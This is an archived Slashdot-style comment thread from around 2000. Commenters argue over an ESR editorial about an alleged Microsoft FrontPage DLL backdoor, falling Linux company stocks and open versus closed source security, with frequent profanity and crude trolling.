1) Are Linux stocks are falling rapidly because it is a failed product?

2) Or are Linux stocks are falling rapidly for other reasons...

Clearly, the answer IS NOT #1! Even through shithead organizations like the United States Air Force and Navy, whom routinely kneel behind Bill Gates and give him a good licking, there is still rapid growth in Linux is many areas.

At least the US Army has the balls to think a little out of the box, with their use of Apple webservers and influence in having National Instruments port LabVIEW over to Linux.

To characterize Linux as "failed" because it does poorly in the stock market is to ignore it's roots and phenomenal growth over the last several years, before it was ever "on the market".

A more likely cause is (for lack of a better term) "Techie Insider IPO Fever". That is, geeky people with money, and internet "knowledge", but no real stock market experience, investing in "hot" items as they come on the market, things they "know about", and then bailing out when the stock tops out. MP3, RedHat, VA Linux, Andover. Main stream, long term investors did not buy these until they started ramping up!

The horrid state of the stock market (ridiculous PE ratios, etc), Greenspan's never-ending interest rate increases, the clear indicators of inflation setting in, combined with the poor performance of the dot-coms has led to a backlash against the market, and tech in particular -- and the newcomer to tech was Linux. Of course it is being hit harder.

Sophisticated, forward thinking people didn't buy Linux -- geeks out for a quick killing, and no sense of what the market is really for, bought Linux.

Anyway, all these Linux companies taking a beating will probably struggle on. They did it all for free (or at a loss) for years anyway. This is nothing new -- I personally think Linux will dominate everything at some point.

Add in some sort of legislation giving tax breaks to companies/corporations deploying non-MSHAFT solutions, or a mandate to reduce government usage/purchases of MSHAFT produts/services, or even a speech from Clinton declaring America's overdepence on MSHAFT software a threat to national security (in the same way a single radio/tv entity would be a threat), and you might see these stocks bounce back up fairly rapidly.

Besides, the last time I looked through the classifieds in the region where I live, there were over a hundred Linux developer openings.

There were only five a year and a half ago. And for all the bitching I see about VA Linux, source forge is pretty cool.

Re:ERIC FUCKING RAYMOND SPEAKS.

[small_dick]

i thought ESR's prediction that the "...US Ecomomy...would crater..." before his six-month holding period was up was particularly interesting.

Re:score -1 Flamebait

[KiboMaster]

To respond to your saying I'm serving the devil himself... Even though I agree what Microsoft has done is wrong, and even though their business tactics have set the computer industry back many years... it's still no reason to throw stones at them.

All I'm saying is that Microsoft has the right to exist. Whether or not I agree with what they have done isn't the issue... I think this editorial slams Microsoft for the purpose of slamming Microsoft.

When you write for a publication, I think you have the responsibility to look at an issue from both sides. This article was blatently one sided. ESR dropped the ball on this one. What he says here reflects back on slashdot as a whole, and I hope slashdot isn't in the business of throwing stones at a company (or anything for that matter) because of personal feelings toward that company.

On the issue of responsibility... Personally I feel that if this hole has cost web developers money, Microsoft should be held responsible.

Reguardless of personal feelings, Microsoft still diserves the same treatment as any other company. It would be hypocritical of us to deny them of that just because we don't like what they've done.

score -1 Flamebait

[KiboMaster]

As much as I agree with ESR about what was said here... I have to play devil's advociate on this one.

As much as I dislike Microsoft's products and general business tacticts, I don't go around telling people how much they suck. I just show people alternatives. (be it Linux, BeOS or whatever)

Microsoft has a right to exist. Kicking them while they're down doesn't help matters much. Microsoft will get what's coming to them in the near future.

I always thought slashdot at least attemped to be serious about journalism. This story has given me doubts. Perhaps a moderation script for the mainpage would be in order.

The Linux community should not revert to FUD!

[mdb31]

This article annoys me to no end. First of all, as has already been pointed out, there is no backdoor: the only thing that happened is that someone managed to get access to a poorly secured site and alerted every major newswire to the 'backdoor' he found before checking whether one actuall existed.

Stripped of all the hype, the worst thing to come out of this is that, apparently, the string "Netscape engineers are weenies!!", reversed, is used in an obsolete version of a Microsoft support DLL (which, BTW, may have its roots in non-Microsoft legacy FrontPage code...) as a 'secret' to 'encrypt' web pages in transit. This is definitely a bad security design (as well as childish), but in this case it happens not to hurt anybody (except perhaps the ego of the few remaining Netscape engineers :-)

The kicker in this article is the claim that there would never be anything like this in the "BIND library" -- well, the library might not have any issues, but BIND itself sure has been the source of a number of root exploits so far, and there is no guarantee whatsoever that this won't happen again in the future

FUD should not become a standard for Linux advocacy...

Re:The Linux community should not revert to FUD!

[gilroy]

Um, as has been pointed out, this story seemed to have a lot of confirmation to it... A competent respected source (NTBugtraq) spoked to a competent respected paper (Wall Street Journal), who decided to publish. (This generally means they sought confirmation of some kind.) The 'backdoor' was confirmed by people at Microsoft, and their whole mantra is that only they can know the software well enough to find these things...

Now, after analysis -- an analysis in line with the philosophy of Open Source, though certainly not technically Open, and though in line with other standards of good conduct -- it is discovered that the original implication of a stored key (ie, a back door) seems not to be true or at least not as bad as it seems. (I'm no net admin but it still seems like this passphrase allows people to do unintended thing, but the scope is much reduced.)

So, I think venting spleen is a little disproportionate here, although it'd be nice if now that the backdoor angle is disproved, people would stop waving the bloody shirt over it.

On the other hand, the sudden scrutiny of the obscure DLL revealed other vulnerabilities of a more serious nature. These vulnerabilities have remained undetected and hence unfixed for four years, due to security by obscurity. The poster says plaintively,

BIND itself sure has been the source of a number of root exploits so far, and there is no guarantee whatsoever that this won't happen again in the future

and I do not doubt the veracity of the statement. But I wonder if these root exploits remained available for four years. I suspect they were discovered and removed much more quickly than that.

Of course, the whole point of an Open Source approach is exactly the knowledge that "here is no guarantee whatsoever that this won't happen again in the future". Thus, it's important to mobilize the greatest possible resources to combat these problems. I like to use the following analogy: You can handle disease in one of two ways: (a) You can live your life in an antiseptic plastic bubble or (b) you can allow yourself to be exposed to lots of diseases, counting on a reactive immune system to figure out ways to counteract them.

Model (a) will keep you disease free, until your bubble is breached (for whatever reason). Then, you find yourself with an underdeveloped immune system and the smallest bug might kill you before your body can adapt. Model (b) runs the risk of continual low-grade infection, but the more serious cases are caught more often and dealt with more quickly and more safely.

To state the obvious, Open Source is more like (b). Microsoft's security through obscurity is more like (a). I hope I've hit you all over the head hard enough. :)

To wrap up, the poster then states

FUD should not become a standard for Linux advocacy...

to which I say "Amen!". Linux advocates shouldn't resort to FUD because they don't have to: On its merits, Linux will trump Windows. No need to distort the truth, when the truth is on your side...

Re:The Linux community should not revert to FUD!

[MrBogus]

Come on -- if the "public as a whole" was ready to worry about security problems, Linux would have about seven users. Every major Linux component has been rootkitted about nine times, here a competant NT admin only needs to delete one obsolete DLL.

The "public" doesn't give a rats ass about this stuff. Nerd politics at it's finest.

About The Author

[Ogre332]

i think the author is biased. i've *never* had a problem with *any* microsoft product.

Re:MS Triumphant

[Maxintern9]

Damn well better bee, since I'm not vested until next January. 'Bout shit my pants this month.

Re:i remember another classic ESR essay..

[Maxintern9]

He has 150,000 shares of lnux. Even if the price drops to $5 (hehe) he's still got $3/4 million. Not super-rich, but not exactly scroungin' for change.

Re:Wrong rating, moderators suck AGAIN

[Maxintern9]

I have a suggestion, instead of either sputtering, bitching, or flaming, why don't you try making a coherent arguement? You should be glad users like Zico are around to question the Conventional Slashdot Wisdom. I've been lurking at this site for a few months and am not at all impressed by the vacuity, cenceit, or the arrogance of thought found on some subjects here, Microsoft being one of them.

This should be a place where intelligent people discuss the subjects, not a Linux Uber-Alles site. Why do you think there are so many ugly flames at 0 and -1. I think it's in part because they see the vacuity of much of the "serious" discussion. Notice that when a topic is posted that generates more intelligent and informed discussion, like the one last night about diesel engines, there are far fewer obscene flames.

Re: Hello, there _is_no back door

[Maxintern9]

Saying somebody is "biased" means nothing. It just means somebody has formed an opinion. There is no evidence at all that Zico is a troll. He just seems like somebody who is sincere in his unconventional (for Slashdot) beliefs. Zico is typically well-reasoned. He is a healthy counterbalance to the pro-linux zealotry and anti-MS FUD that fills up Slashdot. To repeat: it is a GOOD THING when intelligent people disagree. That's what Slashdot is supposed to be about.

so there we are

[rifter]

Finally incontrovertable proof that security on the basis of obscurity is a complete illusion

I'm not a expert....

[rswinford]

But why isn't redhat or va or *someone* running ads with their newly gained cash about this, when are they gonna learn to seize the moment? especially after THE trial, why arent they ripping the guts out of microsoft? rob

That's got to hurt!

[DeHackEd]

This has been present for FOUR years? That has really got to hurt Microsoft's reputation. Easy to use, absolutely. User-friendly? Of course! Secure? Umm, I'll take a rain check on that (patch released a month later).

Microsoft has been known for making buggy software, but whenever Windows crashes on me, it's (usually) because of an extreme load or some program crashing that ends up taking kernel32 down with it. To actually and purposely place a security flaw in a program is just unthinkable. Geez, what do you say to something like that?!?

Things just arn't going to well for them recently. What a shame.

Re:i remember another classic ESR essay..

[Ars-Fartsica]

$3/4 million? After taxes he's well below most silicon valley receptionsists.

Re:pumping linux in my ASS

[Ars-Fartsica]

Firstly, linux != LNUX, and linux != RHAT and linux != CORL, etc. These are merely outfitters of distributions. If their stock tanks, it doesn't mean squat because we've all still got linux, and the GPL ensures we'll always have it, free to be.

It would be amusing if it were as simple as this, but the value of linux corresponds to its adoption by major vendors. These vendors are paying close attention to the profitability of the linux market, which so far is certainly in question.

Boo Hoo *Cry* *Cry*

[jeremyf]

If there were a backdoor, guess the only way it would be exploited? Yep, you're right, if it were OPEN SOURCE. Since Microsoft doesn't make open source programs, I can be confident that nobody will be able to hack into my Microsoft PowerPoint until Microsoft themselves find out about it, and immediately release a patch.

What do you get with Open Source? You got it, a crappy closed-market operating system like Linux. If a company spends millions and millions of dollars making a product, they should be allowed to keep how it works secret. If this causes major problems, people will stop using that product, which is obviously not the case with Windows. Even with the most minor security problem, Microsoft has everyone's computer in the world pop up a window that says, 'CRITICAL UPDATE AVAILABLE! DOWNLOAD NOW,' which makes that 'backdoor' never be used to do any major damage.

What does do major damage? All these open-source holier-than-Microsoft "hackers" who spend all their time praying to their open source gods making spoofers and routers and god knows what to take down Buy.com for giggles and poops.

- Jeremy Fuller

Zico... Piss Off

[child_of_mercy]

You don't like Slashdot.. Slashdot doesn't like you. No-body forces you to come here and pull your "sand in the vaseline". And yet still you are here. Why is this we ask? hmm look at that hotmal address.. who pays your bills??

Re:MOD THIS UP

[Tossed+Salad+Man!]

Why do that when you can crawl inside my ass and give me a... TOSSED SALAD! ;) bitch
--

Re:MOD THIS UP

[Tossed+Salad+Man!]

Eww, you jellatenous bastard.

Chris Rock rulez!!!
--

Get me Bill Gates!

[acehole]

You would really have to wonder what goes through the minds of the microsoft engineers when they're designing and writting the code for windows and its products. The company is in the middle of a anti-trust minefield yet it insists on giving the middle finger in the way in acts. So what if it was another company that was doing that? or even the beloved Linus (tux bless his soul) who could have an evil motive for writting code... Would as many pppl throw up there arms and go on a witch hunt looking for the evil programmers behind this nasty and wicked code? would you mind if linus and his buds were getting r00t on your box? or would you rather Bill Gates checking to make sure that you've registered and bought all of his company products? (havent we all ;) oh well i've ranted enough today, time to fill up my jim beam glass...

Can you imagine...

[Patrick+Bateman]

... a Microsoft® Cluster Server© cluster of these?

Thank you.

Since we're on the subject of backdoors...

[Patrick+Bateman]

... would a program that maliciously lowers the stock price of Linux-oriented companies -- and then prevents Linux-oriented web sites from mentioning the matter -- be termed a "virus", a "worm", a "trojan horse", or what?

Thank you.

Re: A Letter to the Trolls

[Linux+Butt+Stupha]

Thanks, that's just what the ASS STUFFING community wanted. rEMEMBER what to dooooooooooooo!